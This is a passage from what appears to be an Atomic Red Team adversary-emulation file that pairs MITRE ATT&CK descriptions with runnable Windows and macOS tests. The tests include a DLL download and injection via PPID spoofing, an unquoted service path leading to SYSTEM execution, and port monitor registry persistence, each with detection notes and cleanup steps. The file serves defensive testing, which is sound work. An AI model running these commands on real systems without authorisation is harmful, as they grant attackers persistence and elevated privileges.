type: path + default: PathToAtomicsFolder\T1134.004\bin\calc.dll + spawnto_process_name: + description: Name of the process to spawn + type: string + default: iexplore + dependency_executor_name: powershell + dependencies: + - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) + +' + prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_path}) 
-ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + executor: + command: | + . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + $ppid=Get-Process #{parent_process_name} | select -expand id + PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}" + cleanup_command: | + Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore + Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore + name: powershell + - name: Parent PID Spoofing - Spawn from Current Process + auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + description: Spawns a powershell.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine + ''#{command_line}'' -ParentId #{parent_pid}' + name: powershell + - name: Parent PID Spoofing - Spawn from Specified Process + auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + description: Spawns a notepad.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + test_guid: + description: Defined test GUID + type: string + default: 12345678-1234-1234-1234-123456789123 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid + #{test_guid}' + name: powershell + - name: Parent PID Spoofing - Spawn from svchost.exe + auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + description: Spawnd a process as a child of the first accessible svchost.exe + process. 
+ supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, + ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | + Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} + -CommandLine ''#{command_line}''' + name: powershell + - name: Parent PID Spoofing - Spawn from New Process + auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + description: Creates a notepad.exe process and then spawns a powershell.exe + process as a child of it. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_name: + description: Parent process to spoof from + type: path + default: "$Env:windir\\System32\\notepad.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent + -FilePath #{file_path} -CommandLine ''#{command_line}''' + name: powershell + T1034: + technique: + id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception + description: |- + **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** + + Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) + + There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. 
+ + ### Unquoted Paths + Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) + + ### PATH Environment Variable Misconfiguration + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + + ### Search Order Hijacking + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. 
(Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). + external_references: + - source_name: mitre-attack + external_id: T1034 + url: https://attack.mitre.org/techniques/T1034 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ + description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking + via .cmd or .bat file. Retrieved July 25, 2016. + source_name: TechNet MS14-019 + - url: http://support.microsoft.com/KB/103000 + description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. + Retrieved November 30, 2014. 
+ source_name: Microsoft Subkey + - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Baggett, M. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved December 4, 2014. + source_name: Baggett 2012 + - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + source_name: SecurityBoulevard Unquoted Services APR 2018 + - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: McFarland, R. (2018, January 26). Windows Privilege Escalation + Guide. Retrieved August 10, 2018. + source_name: SploitSpren Windows Priv Jan 2018 + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 + description: Hill, T. (n.d.). Windows NT Command Shell. Retrieved December + 5, 2014. + source_name: Hill NT Shell + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx + description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. 
+ source_name: MSDN Environment Property + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + revoked: false + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-07-06T18:49:35.645Z' + created: '2017-05-31T21:30:36.140Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_effective_permissions: + - User + - Administrator + - SYSTEM + x_mitre_detection: "Monitor file creation for files named after partial directories + and in locations that may be searched for common processes through the environment + variable, or otherwise should not be user writable. Monitor the executing + process for process executable paths that are named for partial directories. + Monitor file creation for programs that are named after Windows system programs + or programs commonly executed without a path (such as \"findstr,\" \"net,\" + and \"python\"). If this activity occurs outside of known administration activity, + upgrades, installations, or patches, then it may be suspicious. \n\nData and + events should not be viewed in isolation, but as part of a chain of behavior + that could lead to other activities, such as network connections made for + Command and Control, learning details about the environment through Discovery, + and Lateral Movement." 
+ x_mitre_contributors: + - Stefan Kanthak + x_mitre_version: '1.0' + x_mitre_deprecated: true + atomic_tests: [] + T1574.007: + technique: + created: '2020-03-13T14:10:43.424Z' + modified: '2020-09-16T16:56:34.583Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.007 + url: https://attack.mitre.org/techniques/T1574/007 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by PATH Environment Variable + description: |- + Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. + + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. 
If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + x_mitre_defense_bypassed: + - Application control + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
+ x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574.008: + technique: + id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. + + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. 
In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). + name: Path Interception by Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.008 + url: https://attack.mitre.org/techniques/T1574/008 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - source_name: Windows NT Command Shell + url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 + description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved + December 5, 2014. + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - source_name: Microsoft Environment Property + url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN + description: Microsoft. (2011, October 24). Environment Property. Retrieved + July 27, 2016. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:03:35.217Z' + created: '2020-03-13T17:48:58.999Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: | + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
+ x_mitre_permissions_required: + - Administrator + - User + - SYSTEM + x_mitre_effective_permissions: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1574.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.009 + url: https://attack.mitre.org/techniques/T1574/009 + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + - source_name: Microsoft CurrentControlSet Services + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree + description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services + Registry Tree. Retrieved March 16, 2020. + - source_name: Help eliminate unquoted path + url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Mark Baggett. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved November 8, 2012. + - source_name: Windows Unquoted Services + url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + - source_name: Windows Privilege Escalation Guide + url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. + Retrieved August 10, 2018. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by Unquoted Path + description: |- + Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. 
Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. + + Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) + + This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. + id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:05:23.755Z' + created: '2020-03-13T13:51:58.519Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. 
Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + identifier: T1574.009 + atomic_tests: + - name: Execution of program.exe as service with unquoted service path + auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f + description: | + When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability + known as Unquoted Service Path which allows a user to gain SYSTEM privileges. + In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. 
+ supported_platforms: + - windows + input_arguments: + service_executable: + description: Path of the executable used for the service and as the hijacked + program.exe + type: path + default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe + executor: + command: | + copy #{service_executable} "C:\Program Files\windows_service.exe" + copy #{service_executable} "C:\program.exe" + sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto + sc start "Example Service" + cleanup_command: | + sc stop "Example Service" >nul 2>&1 + sc delete "Example Service" >nul 2>&1 + del "C:\Program Files\windows_service.exe" >nul 2>&1 + del "C:\program.exe" >nul 2>&1 + del "C:\Time.log" >nul 2>&1 + name: command_prompt + elevation_required: true + T1547.011: + technique: + created: '2020-01-24T20:02:59.149Z' + modified: '2021-03-30T00:51:59.629Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1547.011 + url: https://attack.mitre.org/techniques/T1547/011 + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html + description: Apple. (2016, September 13). Adding Login Items. Retrieved July + 11, 2017. 
+ source_name: Adding Login Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Plist Modification + description: "Adversaries may modify plist files to run a program during system + boot or user login. Property list (plist) files contain all of the information + that macOS and OS X uses to configure applications and services. These files + are UTF-8 encoded and formatted like XML documents via a series of keys surrounded + by < >. They detail when programs should execute, file paths to the executables, + program arguments, required OS permissions, and many others. plists are located + in certain locations depending on their purpose such as /Library/Preferences + (which execute with elevated privileges) and ~/Library/Preferences + (which execute with a user's privileges). \n\nAdversaries can modify plist + files to execute their code as part of establishing persistence. plists may + also be used to elevate privileges since they may execute in the context of + another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for + execution at login is com.apple.loginitems.plist.(Citation: Methods + of Mac Malware Persistence) Applications under this plist run under the logged + in user's context, and will be started every time the user logs in. 
Login + items installed using the Service Management Framework are not visible in + the System Preferences and can only be removed by the application that created + them.(Citation: Adding Login Items) Users have direct control over login items + installed using a shared file list which are also visible in System Preferences + (Citation: Adding Login Items). Some of these applications can open visible + dialogs to the user, but they don’t all have to since there is an option to + \"hide\" the window. If an adversary can register their own login item or + modified an existing one, then they can use it to execute their code for a + persistence mechanism each time the user logs in (Citation: Malware Persistence + on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled + can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) + can do this as well. (Citation: Adding Login Items)" + id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. + + All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. 
Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) + + Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1547.011 + atomic_tests: + - name: Plist Modification + auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 + description: 'Modify MacOS plist file in one of two directories + +' + supported_platforms: + - macos + executor: + steps: | + 1. Modify a .plist in + + /Library/Preferences + + OR + + ~/Library/Preferences + + 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) + name: manual + T1547.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.010 + url: https://attack.mitre.org/techniques/T1547/010 + - url: http://msdn.microsoft.com/en-us/library/dd183341 + description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, + 2014. + source_name: AddMonitor + - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf + description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint + slides]. Retrieved November 12, 2014. + source_name: Bloxham + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Port Monitors + description: "Adversaries may use port monitors to run an attacker supplied + DLL during system boot for persistence or privilege escalation. A port monitor + can be set through the AddMonitor API call to set a DLL to be + loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 + and will be loaded by the print spooler service, spoolsv.exe, on boot. The + spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) + Alternatively, an arbitrary DLL can be loaded if permissions allow writing + a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. + \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* + Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this + technique to load malicious code at startup that will persist on system reboot + and execute as SYSTEM." + id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-01-24T19:46:27.750Z' + created: '2020-01-24T19:46:27.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: + AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are + abnormal. New DLLs written to the System32 directory that do not correlate + with known good software or patching may be suspicious. \n\nMonitor Registry + writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. 
+ Run the Autoruns utility, which checks for this Registry key as a persistence + mechanism (Citation: TechNet Autoruns)" + x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_contributors: + - Stefan Kanthak + - Travis Smith, Tripwire + x_mitre_platforms: + - Windows + identifier: T1547.010 + atomic_tests: + - name: Add Port Monitor persistence in Registry + auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent + reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + supported_platforms: + - windows + input_arguments: + monitor_dll: + description: Addition to port monitor registry key. Normally refers to a + DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions + allow writing a fully-qualified pathname for that DLL. + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" + /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ + +' + cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" + +' + name: command_prompt + elevation_required: true + T1055.002: + technique: + created: '2020-01-14T01:27:31.344Z' + modified: '2020-11-10T18:29:30.882Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: 